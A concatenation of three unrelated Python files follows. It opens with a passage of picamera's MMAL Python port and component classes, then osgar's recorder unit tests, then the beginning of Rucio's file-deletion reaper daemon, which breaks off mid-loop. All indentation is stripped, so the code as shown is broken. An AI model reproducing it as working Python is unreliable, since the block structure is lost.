The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; it's meant to be the connection making
# the callback prior to the buffer getting to the port after all
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
# but what about output ports?
try:
# XXX Return value? If it's an input port we should ignore it,
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between Python and and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
|
test_record.py
|
import unittest
from unittest.mock import patch, MagicMock
from datetime import timedelta
import json
import os
import threading
import signal
import subprocess
import tempfile
import sys
from osgar.record import Recorder
class Sleeper:
def __init__(self, cfg, bus):
self.e = threading.Event()
def start(self):
self.t = threading.Thread(target=self.e.wait, args=(5,))
self.t.start()
def join(self, timeout=None):
self.t.join(timeout)
def request_stop(self):
self.e.set()
class RecorderTest(unittest.TestCase):
def test_dummy_usage(self):
empty_config = {'modules': {}, 'links':[]}
with Recorder(config=empty_config, logger=MagicMock()) as recorder:
pass
def test_missing_init(self):
# init section for modules is now optional
mini_config = {'modules': {
"dummy": {
"driver": "osgar.test_record:Sleeper"
},
}, 'links':[]}
with Recorder(config=mini_config, logger=MagicMock()) as recorder:
pass
def test_config(self):
with patch('osgar.drivers.logserial.serial.Serial') as mock:
instance = mock.return_value
instance.read = MagicMock(return_value=b'$GNGGA,182433.10,5007.71882,N,01422.50467,E,1,05,6.09,305.1,M,44.3,M,,*41')
config = {
'modules': {
'gps': {
'driver': 'gps',
'out':['position'],
'init':{}
},
'serial_gps': {
'driver': 'serial',
'out':['raw'],
'init': {'port': 'COM51', 'speed': 4800}
}
},
'links': [('serial_gps.raw', 'gps.raw')]
}
logger = MagicMock(write = MagicMock(return_value=timedelta(seconds=135)))
with Recorder(config=config, logger=logger) as recorder:
self.assertEqual(len(recorder.modules), 2)
self.assertEqual(sum([sum([len(q) for q in module.bus.out.values()])
for module in recorder.modules.values()]), 1)
def test_spider_config(self):
# first example with loop spider <-> serial
with open(os.path.dirname(__file__) + '/../config/test-spider.json') as f:
config = json.loads(f.read())
with patch('osgar.drivers.logserial.serial.Serial') as mock:
logger = MagicMock()
recorder = Recorder(config=config['robot'], logger=logger)
def test_all_supported_config_files(self):
supported = ['test-spider.json', 'test-gps-imu.json',
'test-spider-gps-imu.json', 'test-windows-gps.json']
with patch('osgar.drivers.logserial.serial.Serial') as mock:
logger = MagicMock()
for filename in supported:
with open(os.path.join(os.path.dirname(__file__), '..', 'config',
filename)) as f:
config = json.loads(f.read())
recorder = Recorder(config=config['robot'], logger=logger)
@unittest.skipIf(os.name != "posix", "requires posix shell")
def test_sigint_shell(self):
config = {
'version': 2,
'robot': {
'modules': {
"app": {
"driver": "osgar.test_record:Sleeper",
"init": {}
},
}, 'links':[]
}
}
with tempfile.NamedTemporaryFile() as cfg:
cfg.write(json.dumps(config).encode('ascii'))
cfg.flush()
env = os.environ.copy()
env['OSGAR_LOGS'] = '.'
with subprocess.Popen(
f"echo starting; {sys.executable} -m osgar.record {cfg.name}; echo should not get here",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
start_new_session=True,
env=env,
) as proc:
grp_id = os.getpgid(proc.pid)
self.assertEqual(proc.stdout.readline().strip(), b"starting")
log_line = proc.stderr.readline().strip().split()
log_filename = log_line[-1]
self.assertTrue(log_filename.endswith(b".log"), log_line)
self.assertIn(b"SIGINT handler installed", proc.stderr.readline())
os.killpg(grp_id, signal.SIGINT)
stdout, stderr = proc.communicate()
self.assertIn(b"committing suicide by SIGINT", stderr)
self.assertEqual(len(stdout), 0, stdout)
self.assertEqual(len(stderr.splitlines()), 1, stderr)
os.unlink(log_filename)
# vim: expandtab sw=4 ts=4
|
reaper.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2015
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2014
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016
'''
Reaper is a daemon to manage file deletion.
'''
import datetime
import hashlib
import logging
import math
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.db.sqla.constants import ReplicaState
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, ServiceUnavailable, RSEAccessDenied,
ReplicaUnAvailable, ResourceTemporaryUnavailable,
DatabaseException, UnsupportedOperation,
ReplicaNotFound, RSENotFound)
from rucio.common.utils import chunks
from rucio.core import monitor
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.replica import list_unlocked_replicas, update_replicas_states, delete_replicas
from rucio.core.rse import sort_rses
from rucio.core.rse_expression_parser import parse_expression
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging, config_get('common', 'loglevel').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def __check_rse_usage(rse, rse_id):
"""
Internal method to check RSE usage and limits.
:param rse_id: the rse name.
:param rse_id: the rse id.
:returns : max_being_deleted_files, needed_free_space, used, free.
"""
max_being_deleted_files, needed_free_space, used, free = None, None, None, None
# Get RSE limits
limits = rse_core.get_rse_limits(rse=rse, rse_id=rse_id)
if not limits and 'MinFreeSpace' not in limits and 'MaxBeingDeletedFiles' not in limits:
return max_being_deleted_files, needed_free_space, used, free
min_free_space = limits.get('MinFreeSpace')
max_being_deleted_files = limits.get('MaxBeingDeletedFiles')
# Get total space available
usage = rse_core.get_rse_usage(rse=rse, rse_id=rse_id, source='srm')
if not usage:
return max_being_deleted_files, needed_free_space, used, free
for var in usage:
total, used = var['total'], var['used']
break
free = total - used
if min_free_space:
needed_free_space = min_free_space - free
return max_being_deleted_files, needed_free_space, used, free
def reaper(rses, worker_number=1, child_number=1, total_children=1, chunk_size=100, once=False, greedy=False, scheme=None, delay_seconds=0):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param child_number: The child number.
:param total_children: The total number of children created per worker.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
"""
logging.info('Starting Reaper: Worker %(worker_number)s, child %(child_number)s will work on RSEs: ' % locals() + ', '.join([rse['rse'] for rse in rses]))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
# Generate a hash just for the subset of RSEs
rse_names = [rse['rse'] for rse in rses]
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rse_names)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
checkpoint_time = datetime.datetime.now()
logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
max_deleting_rate, nothing_to_do = 0, True
for rse in sort_rses(rses):
try:
